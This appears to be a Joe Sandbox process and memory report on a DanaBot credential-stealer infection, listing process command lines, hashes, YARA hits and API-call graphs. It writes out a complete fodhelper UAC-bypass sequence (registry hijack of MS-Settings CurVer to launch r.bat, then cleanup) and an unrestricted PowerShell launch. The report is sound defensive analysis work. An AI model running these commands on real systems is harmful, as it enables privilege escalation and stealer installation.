                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:FoDHelper.exe
                                                                      Imagebase:0x7ff6f12a0000
                                                                      File size:49'664 bytes
                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:26
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell.exe -w 1 -ep Unrestricted -nop
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:27
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:28
                                                                      Start time:03:05:18
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:29
                                                                      Start time:03:05:19
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:30
                                                                      Start time:03:05:19
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:33
                                                                      Start time:03:05:24
                                                                      Start date:27/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
                                                                      Imagebase:0x7ff702560000
                                                                      File size:5'641'176 bytes
                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:34
                                                                      Start time:04:07:55
                                                                      Start date:27/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                      Imagebase:0x7ff6c3ff0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:35
                                                                      Start time:04:07:55
                                                                      Start date:27/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                      Imagebase:0x7ff6c3ff0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:38
                                                                      Start time:04:08:02
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:39
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:40
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:41
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:FoDHelper.exe
                                                                      Imagebase:0x7ff6f12a0000
                                                                      File size:49'664 bytes
                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:42
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:43
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:44
                                                                      Start time:04:08:04
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:45
                                                                      Start time:04:08:04
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:46
                                                                      Start time:04:08:04
                                                                      Start date:27/12/2024
                                                                      Path:C:\Users\user\AppData\Roaming\mama.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\mama.exe
                                                                      Imagebase:0x400000
                                                                      File size:4'277'248 bytes
                                                                      MD5 hash:72B6B07175EF611CE7DAA959A1248AAE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 71%, ReversingLabs
                                                                      Has exited:false

                                                                      Target ID:47
                                                                      Start time:04:08:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:48
                                                                      Start time:04:08:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:49
                                                                      Start time:04:08:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:50
                                                                      Start time:04:08:10
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                                      Imagebase:0x410000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:51
                                                                      Start time:04:08:10
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:52
                                                                      Start time:04:08:10
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                                      Imagebase:0x4a0000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1315575661.00007FFAACA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ffaaca20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction ID: 620b3dba007e650f80db8260b08a0d663cb6f0e19fb0176174f2a951e936a351
                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction Fuzzy Hash: 8F01A77011CB0C8FDB48EF0CE451AB5B3E0FB85320F10052DE58AC3661DA32E882CB41
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1315575661.00007FFAACA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ffaaca20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdbda93afecdc460aa4e43a4519c41d6a6c80fcf4dd81c7ded2077d3b20e5549
                                                                        • Instruction ID: 5828addfcdfdeda1588e7044b1a7a439809d74adcca9d931ee08ef3e2c5f699f
                                                                        • Opcode Fuzzy Hash: cdbda93afecdc460aa4e43a4519c41d6a6c80fcf4dd81c7ded2077d3b20e5549
                                                                        • Instruction Fuzzy Hash: 8FB1656791E7D78FE312976CA8A54F63F60EF53624B0943F3D0CA8A0A3F915540AC6D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669548550.0000020454DA1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020454DA1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_20454da1000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X(!P
                                                                        • API String ID: 0-4267158302
                                                                        • Opcode ID: 70be6f038ebe1ecf87541da9a1c831808360e08eef8c1910c422574e589d882a
                                                                        • Instruction ID: 318830515fe6935c835cefbe38d52ab69dc08f16f365699db754f04808605335
                                                                        • Opcode Fuzzy Hash: 70be6f038ebe1ecf87541da9a1c831808360e08eef8c1910c422574e589d882a
                                                                        • Instruction Fuzzy Hash: 9E4126A161DB880FE799A66D089A3653FD1DBF6348FC541DBC444CF1D3E104CC8A8342
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669519633.0000020454DA2000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020454DA2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_20454da2000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ac63bb44311bd0a2a33b5cd8edb36f06b1461d89ec825ca026a1360d7f40c45
                                                                        • Instruction ID: 9fca655c72eb86068da514211fbde6beb9ce61faa0aac24691849c8dee499975
                                                                        • Opcode Fuzzy Hash: 5ac63bb44311bd0a2a33b5cd8edb36f06b1461d89ec825ca026a1360d7f40c45
                                                                        • Instruction Fuzzy Hash: 0211C4B160DB880FF79EA57A583C3652ED1E7F6344FC644AB9546CB2E3E8048CC98352
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: r6/$r6/
                                                                        • API String ID: 0-3679798658
                                                                        • Opcode ID: 81d234351f2268a82483daf3494009e4b17bb54616eeac791b1b949d64c544b8
                                                                        • Instruction ID: f441e04ce813fa6533dcc74abd917f7fe4588032b2702c1b0f5318d7e6ea27e4
                                                                        • Opcode Fuzzy Hash: 81d234351f2268a82483daf3494009e4b17bb54616eeac791b1b949d64c544b8
                                                                        • Instruction Fuzzy Hash: EB52496290EBC64FE397976848565B57FE1EF53690B0841FBD08DC71E3DD189C0A8392
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: r6/$r6/
                                                                        • API String ID: 0-3679798658
                                                                        • Opcode ID: 8e7cbec99f34de379cc50c9838bc89b2c14d9e35d14fc2786941cea0bcca34d9
                                                                        • Instruction ID: 7401bf95aed51c066df54b11ac8e8311bf765163dd710065342c4d0487e0f139
                                                                        • Opcode Fuzzy Hash: 8e7cbec99f34de379cc50c9838bc89b2c14d9e35d14fc2786941cea0bcca34d9
                                                                        • Instruction Fuzzy Hash: 62113A23E1EA0A8BF2A9971C675B1BC22C1EFA7BE0F49527AD48DC35E6DD0C6C0501C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30bd91d8096edaaee06eb6f2712a827e2142c41084c86fca5c90014889b41703
                                                                        • Instruction ID: 5f8412687e142a8a359f66242a71dbde260271bc6e35622496645544b9a193c2
                                                                        • Opcode Fuzzy Hash: 30bd91d8096edaaee06eb6f2712a827e2142c41084c86fca5c90014889b41703
                                                                        • Instruction Fuzzy Hash: E241E653E0FA879BE3A7976804652755AC2FF97A90F4844B9D44DC31F3DE299C0843C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1661231734.00007FFAAB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab3f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3e6dd54b63d5d632126e35a7a08626c015f8165c9f7962c45238f9e3ec1f562
                                                                        • Instruction ID: eb2b5ec5f2523d1d36bcf909b24883daeb6ec04444217999827b4a2f8784759a
                                                                        • Opcode Fuzzy Hash: d3e6dd54b63d5d632126e35a7a08626c015f8165c9f7962c45238f9e3ec1f562
                                                                        • Instruction Fuzzy Hash: 7901677111CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E881CB45
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f65ec55ee38be22f498acb029d016285e7b1f1322fc3243cbdbc55e4b022dce
                                                                        • Instruction ID: 519dd4651e50f9c4e4ee598d50dfe70b239f90ba3d865bd3a556491caf4bd17e
                                                                        • Opcode Fuzzy Hash: 9f65ec55ee38be22f498acb029d016285e7b1f1322fc3243cbdbc55e4b022dce
                                                                        • Instruction Fuzzy Hash: C2E0D833E0E9294FA7A6EB9C68595F86A85DF56B6570441B7E90CD3291DC049C1443C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1661231734.00007FFAAB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab3f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (0L$8,L$H1L$P/L$p0L
                                                                        • API String ID: 0-795106677
                                                                        • Opcode ID: 709b4689b8bc808d1bce72c8828b62ac58278835c0d559ab4c8fb9232388d475
                                                                        • Instruction ID: 55a9379387de0d639bbbf127f49811a0cf8af7bd6cdd28ef45107fb8682b6db9
                                                                        • Opcode Fuzzy Hash: 709b4689b8bc808d1bce72c8828b62ac58278835c0d559ab4c8fb9232388d475
                                                                        • Instruction Fuzzy Hash: 05316F8690FFC15FE3568BB818652656F90EF63294B1C80FFD0C84A9EB9984AD0D83D1

                                                                        Execution Graph

                                                                        Execution Coverage:16.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:7.1%
                                                                        Total number of Nodes:536
                                                                        Total number of Limit Nodes:13
                                                                        [Execution graph: the rendered node/edge list is not readable as text. API-calling nodes recovered from it, grouped for reading; addresses are the graph's node IDs.]
                                                                        • Networking: 3549234 WSAStartup, GetLastError
                                                                        • Dynamic loading and API resolution: 320c800 LoadLibraryW (x3); 320c878 LoadLibraryW (13 calls); 320cca3 LoadLibraryW; 35259aa LoadLibraryW; 3525340 LoadLibraryA, GetProcAddress; 3071909 LoadLibraryA; 3071a07 GetProcAddress; 30687a8 GetModuleHandleW, GetProcAddress; 3073780 / 30737b1 GetProcAddress; 3071764 GetModuleHandleW; 306dbc4 GetModuleHandleW; 306dbec GetProcAddress; 306e544 LoadLibraryExW; 3069c5f / 30719a4 FreeLibrary
                                                                        • Memory management: 320bfa4 VirtualProtect; 30658ac VirtualQuery; 3065912 / 3065928 / 3065780 / 30656c1 VirtualAlloc; 30711a0 / 3071977 LocalAlloc
                                                                        • Service control: 351a4a4 RegisterServiceCtrlHandlerExW; 351a4b8 SetServiceStatus; 3069d94 CreateThread
                                                                        • Environment queries: 30678ef / 3525968 GetVersionExW; 3525854 VerSetConditionMask, VerifyVersionInfoW; 30687d0 / 30687f1 GetLogicalProcessorInformation
                                                                        • Locale and resource-module lookup (306d… / 306e…): 306e43f / 3069f80 GetUserDefaultUILanguage; 306e467 / 306db09 / 306db24 GetSystemDefaultUILanguage; 306d964 GetThreadUILanguage; 306d920 GetThreadPreferredUILanguages; 306da28 / 306da59 / 306d95a SetThreadPreferredUILanguages; 306dadd / 306d80c IsValidLocale; 306d81f GetLocaleInfoW; 306d254 / 306e4b8 / 306dddf GetModuleFileNameW; 306de1c .. 306debb RegOpenKeyExW (6 calls); 306defb / 306df21 / 306df4c / 306df70 RegQueryValueExW; 306dfb2 RegCloseKey; 306dce4 / 306e1c2 FindFirstFileW; 306dd00 / 306e1d2 FindClose; 306dd4e lstrlenW; 306dba6 CharNextW; 30700c0 LoadStringW; 306da80 EnterCriticalSection / LeaveCriticalSection
